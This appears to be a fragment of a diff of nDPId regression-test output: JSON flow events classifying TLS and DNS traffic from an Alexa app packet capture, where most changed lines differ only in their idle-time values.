+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 